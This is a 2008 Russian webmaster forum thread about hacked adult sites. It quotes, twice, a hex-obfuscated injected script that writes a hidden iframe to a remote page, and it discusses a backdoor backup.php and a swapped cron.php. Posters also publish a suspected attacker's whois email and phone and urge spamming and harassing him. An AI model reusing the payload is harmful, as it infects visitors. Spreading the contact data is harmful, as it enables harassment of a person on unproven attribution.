С нами с 02.02.07
Сообщения: 294
Рейтинг: 395
|
 Добавлено: 18/01/08 в 04:23 |
доброго времени суток...сегодня на сайтах заметил такую хреновину:
<script> var s='3C696672616D65207372633D22687474703A2F2F7777772E68716D70672E636F6D2F66726565706F726E2F7468756D62732F7A2F7374617469632E706870222077696474683D32206865696768743D32207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} document.write(unescape(o)); </script>
заражаются файлы стрима face.html
и все html в директории tmp
если их удалять, они пересоздаються
что посоветуете сделать?
P.S.вчера только сделал абдейт стрима. Причем в админке показываеться нормальный шаблон..без кода
Последний раз редактировалось: Revival (19/01/08 в 17:59), всего редактировалось 2 раз(а)
|
|
|
|
| |
С нами с 28.09.07
Сообщения: 214
Рейтинг: 83
|
| Добавлено: 18/01/08 в 09:10 |
Обратись ко мне в аську, может не из за движка вовсе. Помогу чем смогу.
Последний раз редактировалось: KpeBeg (18/01/08 в 20:08), всего редактировалось 1 раз
|
|
|
|
| |
С нами с 18.12.03
Сообщения: 3677
Рейтинг: 1216
|
| Добавлено: 18/01/08 в 10:20 |
Как эта вся срань надоела . И мудилы кому нехер делать.
|
|
|
|
Traffic Vendor – Новый траффик брокер! Лей на нас и гарантировано получишь больше чем с других бирж!
|
0
|
|
| |
罪人
С нами с 02.04.06
Сообщения: 736
Рейтинг: 849
|
| Добавлено: 18/01/08 в 10:33 |
Если проблема в действительно стриме обязательно стукни к Душику... он человек адекватный, придумает чтонибуть....
тем более если пошла такая жара то походу это может стать общей проблемой.....
|
|
|
|
| |
XXX-Server.biz
С нами с 15.02.03
Сообщения: 9411
Рейтинг: 6676
|
| Добавлено: 18/01/08 в 11:47 |
попробуй из бэкапов которые стрим делает восстановиться
|
|
|
|
| |
С нами с 21.09.04
Сообщения: 609
Рейтинг: 473
|
| Добавлено: 18/01/08 в 13:44 |
А ты закрыл ли x2.cgi?
И не остался в у тебя в стримовых бэкапах файл backup.php ?
Полностью ли была очищена файловая система после первого взлома?
Может это не "новый взлом", а дефейсы через остававшиеся файлы?
|
|
|
|
| |
С нами с 22.09.04
Сообщения: 114
Рейтинг: 204
|
| Добавлено: 18/01/08 в 13:46 |
почитайте пожалуйста топики про взлом at3, например Похоже, что 16-й билд ат3 такой же дырявый... 
тот код который показывает топикстартер, вставляется в html файлы, которые могут найти при взломе этого cj-скрипта. Типичный случай (к сожалению).
зы. Быду признателен, если подправишь название топика ;)
|
|
|
|
| |
С нами с 22.09.04
Сообщения: 114
Рейтинг: 204
|
| Добавлено: 18/01/08 в 13:50 |
2Revival - поищи "левые" файлы, например backup.php. А также файлы содержащие:
<script> var s='3C696672616D65207372633D22687474703A2F2F7777772E68716D70672E636F6D2F66726565706F726E2F7468756D62732F7A2F7374617469632E706870222077696474683D32206865696768743D32207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} document.write(unescape(o)); </script>
По всему серверу, после удаления - пересохрани темплейт. face.html можно вообще удалить.
|
|
|
|
| |
Хостинг, CDN
С нами с 23.12.04
Сообщения: 1259
Рейтинг: 1405
|
| Добавлено: 18/01/08 в 23:49 |
Revival, если не сложно, посмотри с какого айпи был добавлен левый трейдер по логам ат3.. скинь сюда..
|
|
|
|
| |
Runka Snorkarka
С нами с 26.05.06
Сообщения: 1751
Рейтинг: 1278
|
| Добавлено: 19/01/08 в 14:30 |
ко мне последний раз долбился с этого адреса 195.5.116.250 причем долбится он каждый день, но mod_security его запросы рубит, а ему пофиг видимо автоматом все делается.
|
|
|
|
| |
С нами с 02.02.07
Сообщения: 294
Рейтинг: 395
|
| Добавлено: 19/01/08 в 17:37 |
больше всего встречались:
64.20.33.150
86.203.108.178
91.121.96.134
79.220.59.76
212.24.224.17
остальных дофига, ломают ботами
195.5.116.250 особо старательный, до сих пор пробует
descr: Compic Ltd.
e-mail: roman@compic.ee
phone: +372 6321028
Спасибо большое всем кто помогал, особенно спс Dushik и одному хорошему человеку.
Предлагаю сделать отдельный раздел и выкладывать там все ИП с которых вас пытались ломать или ломали.
А еще предлагаю всем кого ломали скинуться на билет до Эстонии,отправить туда самого большого АВМа и выловить это особо умное тело с целью причинения телу травм :-)
|
|
|
|
| |
С нами с 22.09.04
Сообщения: 114
Рейтинг: 204
|
| Добавлено: 19/01/08 в 18:24 |
|
|
|
|
| |
Хостинг, CDN
С нами с 23.12.04
Сообщения: 1259
Рейтинг: 1405
|
| Добавлено: 21/01/08 в 13:53 |
| Revival писал: |
195.5.116.250 особо старательный, до сих пор пробует
descr: Compic Ltd.
e-mail: roman@compic.ee
phone: +372 6321028
|
Этот Роман, кто он там, админ или нет, я не в курсе, но убитый на голову человек..
Кто-нить ему еще писал, интересно, кроме меня? Завалить его мессагами, дак может проймет человека..
|
|
|
|
| |
С нами с 03.04.07
Сообщения: 158
Рейтинг: 56
|
| Добавлено: 22/01/08 в 15:05 |
| Revival писал: |
195.5.116.250 особо старательный, до сих пор пробует
descr: Compic Ltd.
e-mail: roman@compic.ee
phone: +372 6321028
|
Дорвейшикам! ребята! добавьте етот email в поле при
сабмите дора в дружественные ресурсы ! 
|
|
|
|
| |
С нами с 30.08.03
Сообщения: 180
Рейтинг: 78
|
| Добавлено: 02/02/08 в 21:35 |
Ахтунг!
Теперь эти господа научились подменять своим файлом стримовский cron.php
|
|
|
|
| |
С нами с 04.07.06
Сообщения: 4956
Рейтинг: 3016
|
| Добавлено: 03/02/08 в 14:45 |
А подробнее???
|
|
|
|
| |
С нами с 16.02.01
Сообщения: 443
Рейтинг: 269
|
| Добавлено: 03/02/08 в 19:20 |
| zevsus писал: | Ахтунг!
Теперь эти господа научились подменять своим файлом стримовский cron.php |
посмотрел этот филе - ничего подозрительного не заметил...
можно подробней - откуда взялись такие предположения ?
|
|
|
|
| |
С нами с 30.08.03
Сообщения: 180
Рейтинг: 78
|
| Добавлено: 04/02/08 в 14:15 |
| webmaster писал: | посмотрел этот филе - ничего подозрительного не заметил...
можно подробней - откуда взялись такие предположения ? |
Увидел, что после чистки всех этих backup.php в файлах продолжает появляться злой код. Поковырявшись, заметил, что пхп код, который обычно содержится в backup.php находится в cron.php одного из стримов. Симптомы: сильно грузится сервак, в процессах висит php, запущенный от имени юзера, от которого запускается стримовский крон, а также несколько find-ов
Судя по логам взлом и подмена сron.php произведены всё через тот же ATL3 (16 билд) + оставили лазейку - файл backup.php, позволяющий выполнять команды на сервере.
Гадили с вот этого IP: 213.251.169.115
|
|
|
|
| |
+ + +
С нами с 08.12.03
Сообщения: 675
Рейтинг: 79
|
| Добавлено: 05/02/08 в 18:23 |
Меня так же сломали. Нашел админ этот файл backup.php. Пришлось полностью чистить сервер. В связи с этим вопрос : как защищаться ?
|
|
|
|
| |
С нами с 30.08.03
Сообщения: 180
Рейтинг: 78
|
| Добавлено: 05/02/08 в 19:06 |
| inSect писал: | | Пришлось полностью чистить сервер. |
Это как? ОС переустановили?
|
|
|
|
| |
+ + +
С нами с 08.12.03
Сообщения: 675
Рейтинг: 79
|
| Добавлено: 05/02/08 в 19:12 |
Я просто переехал на другой, а на том - все под реинсталл.
|
|
|
|
| |
С нами с 05.11.05
Сообщения: 1563
Рейтинг: 1240
|
| Добавлено: 15/02/08 в 05:40 |
|
|
|
|
| |
С нами с 03.05.07
Сообщения: 801
Рейтинг: 825
|
| Добавлено: 15/02/08 в 05:52 |
Все юзаем CJLog Alerts  Сервис уже многих спас от взлома и от длительных даунов сервака!
|
|
|
|
| |
(.)(.) Сиськеее...
С нами с 20.05.03
Сообщения: 2598
Рейтинг: 2651
|
| Добавлено: 15/02/08 в 10:08 |
Аналогично...
После обнаружения админы почистили все..., зловредный код вроде больше не появляется..., но файло backup.php все-равно откуда-то восстанавливается... Уже и бэкапы стрима килял и что только не делал...
Сиж так и не восстановился после расколбаса...
|
|
|
|
| |
С нами с 30.08.03
Сообщения: 180
Рейтинг: 78
|
| Добавлено: 15/02/08 в 11:55 |
| Project писал: | но файло backup.php все-равно откуда-то восстанавливается... Уже и бэкапы стрима килял и что только не делал...
Сиж так и не восстановился после расколбаса... |
Стукни ко мне, расскажу где копать
|
|
|
|
| |
